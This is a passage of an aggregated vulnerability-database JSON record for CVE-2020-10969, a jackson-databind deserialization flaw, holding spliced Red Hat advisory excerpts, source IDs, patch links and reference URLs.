https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK\n1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa\n5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr\noomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f\nZ8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io\nOhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX\nk9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG\nC2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5\n/6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta\nD2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a\nf4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG\n1yK/tAm1KBU=osSG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18881 - Upgrade Undertow to 2.0.30.SP1\nJBEAP-18974 - Upgrade snakeyaml to 1.26\nJBEAP-18975 - Upgrade cryptacular to 1.2.4\nJBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001\nJBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final\nJBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final\nJBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final\nJBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes\n\n6. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server patch from the customer portal. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. 7) - noarch\n\n3. Description:\n\nThe jackson-databind package provides general data-binding functionality\nfor Jackson, which works on top of Jackson core streaming API. Bugs fixed (https://bugzilla.redhat.com/):\n\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-10969"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
},
{
"db": "VULHUB",
"id": "VHN-163500"
},
{
"db": "VULMON",
"id": "CVE-2020-10969"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "157322"
}
],
"trust": 2.43
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-10969",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159724",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157859",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157322",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.1399",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1368",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3703",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1882",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48375",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.2
},
{
"db": "CNVD",
"id": "CNVD-2020-24034",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163500",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-10969",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163500"
},
{
"db": "VULMON",
"id": "CVE-2020-10969"
},
{
"db": "PACKETSTORM",
"id": "158650"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
},
{
"db": "NVD",
"id": "CVE-2020-10969"
}
]
},
"id": "VAR-202003-1776",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163500"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T21:41:48.201000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Block one more gadget type (javax.swing, CVE-2020-10969) #2642",
"trust": 0.8,
"url": "https://github.com/FasterXML/jackson-databind/issues/2642"
},
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115311"
},
{
"title": "Red Hat: Important: rh-maven35-jackson-databind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201523 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 19 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202333 - Security Advisory"
},
{
"title": "Red Hat: Important: Satellite 6.8 release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204366 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple Security Vulnerabilities in Jackson-Databind Affect IBM Sterling B2B Integrator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9bb4efe27af18414a7db703d1dd40070"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "IBM: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=2ec7385c474071281be069b54d841de6"
},
{
"title": "cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
},
{
"title": "Java-Deserialization-CVEs",
"trust": 0.1,
"url": "https://github.com/PalindromeLabs/Java-Deserialization-CVEs "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-10969"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1627"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163500"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003491"
},
{
"db": "NVD",
"id": "CVE-2020-10969"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10969"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2642"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-10969"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.7,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.7,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/fasterxml-jackson-databind-denial-of-service-via-jeditorpane-serialization-gadgets-typing-32062"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1368/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3703/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cognos-business-intelligence-has-addressed-multiple-vulnerabilities-q12021/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157859/red-hat-security-advisory-2020-2333-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2588/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cognos-analytics-has-addressed-multiple-vulnerabilities-3/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6525182"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-faster-xml-jackson-databind-affect-ibm-spectrum-protect-plus-cve-2020-10673-cve-2020-1112-cve-2020-11113-cve-2020-10672-cve-2020-10968-cve-2020-10969-cve-2/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2619/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1766/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/157322/red-hat-security-advisory-2020-1523-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1882/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/158651/red-hat-security-advisory-2020-3197-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159208/red-hat-security-advisory-2020-3779-01.html"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/support/pages/node/6528214"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3190/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-affects-ibm-jazz-foundation-and-ibm-engineering-products/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/159724/red-hat-security-advisory-2020-4366-01.html"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/48375"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1399/"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9546"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-10672"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-9548"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-8840"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11111"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2020-7238"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-10673"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10672"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11619"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-11620"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2019-20330"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11112"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11113"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12406"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9514"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20444"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11620"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9512"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12406"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17573"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11612"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9514"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-9515"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20445"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-20444"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-16869"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9512"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-11612"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16869"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12423"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20445"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14061"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14062"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10673"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2019-10086"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10086"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/errata/rhsa-2020:1523"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-1718"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-14060"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9515"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-13990"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1718"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-9518"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13990"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7238"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9518"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16335"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16943"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17531"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16335"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0210"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17531"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14540"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17267"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16942"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14892"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16943"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-12419"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-17267"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-0205"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14893"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-16942"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14893"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14888"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14892"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2019-14887"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14540"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14888"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9547"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9548"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-9546"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8840"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1695"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-1745"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/502.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/palindromelabs/java-deserialization-cves"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:3196"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=rhdm\u0026version=7.8.0"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_decision_manager/7.8/html/release_notes_for_red_hat_decision_manager_7.8/index"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/documentation/en-us/red_hat_build_of_thorntail/2.5/html/release_notes_for_thorntail_2.5/"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:2067"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-3875"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14832"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions\u0026product=catrhoar.thorntail\u0026version=2.5.1"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-9511"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-10201"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-1729"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10199"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12400"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14838"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10219"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14820"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2020:4366"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-16782"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-12781"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5267"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14380"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-8184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14334"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10693"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-5217"
},
{
